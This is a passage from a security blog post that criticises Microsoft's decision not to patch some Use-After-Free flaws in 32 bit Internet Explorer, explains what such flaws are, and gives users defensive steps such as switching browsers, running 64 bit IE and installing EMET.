While this fact is not in doubt, the 32 bit version of IE is still very widely used, as I mentioned in a previous blog post. There is a possibility that the amount of development and testing needed to resolve these flaws in the 32 bit version may be much larger than the benefit it would provide. Use-After-Free flaws are usually given Important or Critical severity ratings since such flaws generally require little to no user intervention to take place. If zero day exploits begin to appear, Microsoft may be forced to reverse this decision.

  • MemoryProtect has led to a significant decrease of IE case submissions

Presumably “case submissions” refers to the number of Use-After-Free and other memory corruption flaws being submitted to Microsoft for analysis. Again, while I acknowledge this is the case and that no mitigation/defence is perfect, when known security issues are presented to you and can impact a very large number of users, you should still try to either reduce the risk further or (if possible) eliminate these issues completely (in this instance, by patching them).

Aside: What is a Use-After-Free vulnerability?
As a web browser downloads and processes the web page that you have requested, it stores the results in memory (the Random Access Memory (RAM) of your PC). When you close a tab of your browser, your browser marks the memory in which that webpage was stored as free (for further use at a later time).

However, where the browser marks memory that it has finished using as free but then tries to use it again (either unintentionally via a software bug resulting from human error, or when deliberately triggered by a piece of malware), malicious code can be placed by an attacker within that section of memory marked as free and, when the browser accesses that section again, it can execute that code. Such exploits are discussed in more detail in this Cisco blog post.

Further alternative definitions of a use-after-free issue are also available:

Red Hat (in reference to a recent Linux kernel vulnerability)
Perception Point: exploiting a use-after-free on a Linux system
Microsoft (also details use-after-free mitigations built into Microsoft Edge and Internet Explorer).

Some may feel that I have been unduly harsh on Microsoft in the above comments. I do believe that not all of the information as to why these issues are not going to be patched has been provided. I also believe that Microsoft should at least consider implementing the suggestions within pages 19 to 21 of this white paper to make exploitation of these issues more difficult.

One interesting point raised in the HP blog post is the following: “Since Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers).” That comment makes more sense (especially if such non-default configurations are not recommended), but no detail is provided as to what settings make IE vulnerable to these flaws (and thus you can’t make the necessary changes to your configuration to mitigate them). It will be interesting to see if any more information can be obtained concerning this non-default configuration.

What Can I Do To Defend Myself From These Unpatched Issues?

  1. A suggestion that does not cost any funds and is easy to implement would be to use another web browser (Mozilla Firefox, Apple Safari, Opera and Google Chrome being the most popular choices).
  2. If you are using a 64 bit version of Windows (you can view this page to check which version you have), use the 64 bit version of IE instead of the 32 bit version. This post explains how, while this post also provides steps to enable all of IE’s processes to be 64 bit rather than 32 bit. If you find an add-on that you use frequently does not work with the 64 bit version of IE, simply reverse the steps in the above tutorials temporarily. Alternatively, navigate to the folder C:\Program Files (x86)\Internet Explorer and double click iexplore.exe to open the 32 bit version of IE.
  3. Install and enable the default settings of Microsoft EMET. On my personal PCs which use Windows 8.1 64 bit and Windows 7 64 bit I have all mitigations for IE 11 64 bit enabled (please note that I have ActiveX filtering enabled and thus no add-ons are running within IE on my PCs). The same settings should work for IE 32 bit. A list of known EMET application incompatibilities is available here. You can also ask questions within the EMET forum. The following are very useful tutorials on EMET 5 and EMET 4 (still relevant).
  4. When Windows 10 is released consider using Microsoft Edge since it incorporates additional defences against Use-After-Free flaws and will always be a 64 bit process on a 64 bit version of Windows 10.

The recommendation of using EMET will not only protect against these unpatched flaws but also make exploitation of known flaws much harder. Alternatives to EMET are Malwarebytes Anti-Exploit (free or paid for versions) and HitmanPro.Alert (paid for product).

I hope the above information is useful in defending against these unpatched flaws. When I first read the blog post from HP I initially thought that the 32 bit version of IE was being ignored, but the information stating that these issues only affect non-default configurations of 32 bit IE makes these issues much less serious. If any further information on these flaws becomes available, I will update this blog post.

Thank you.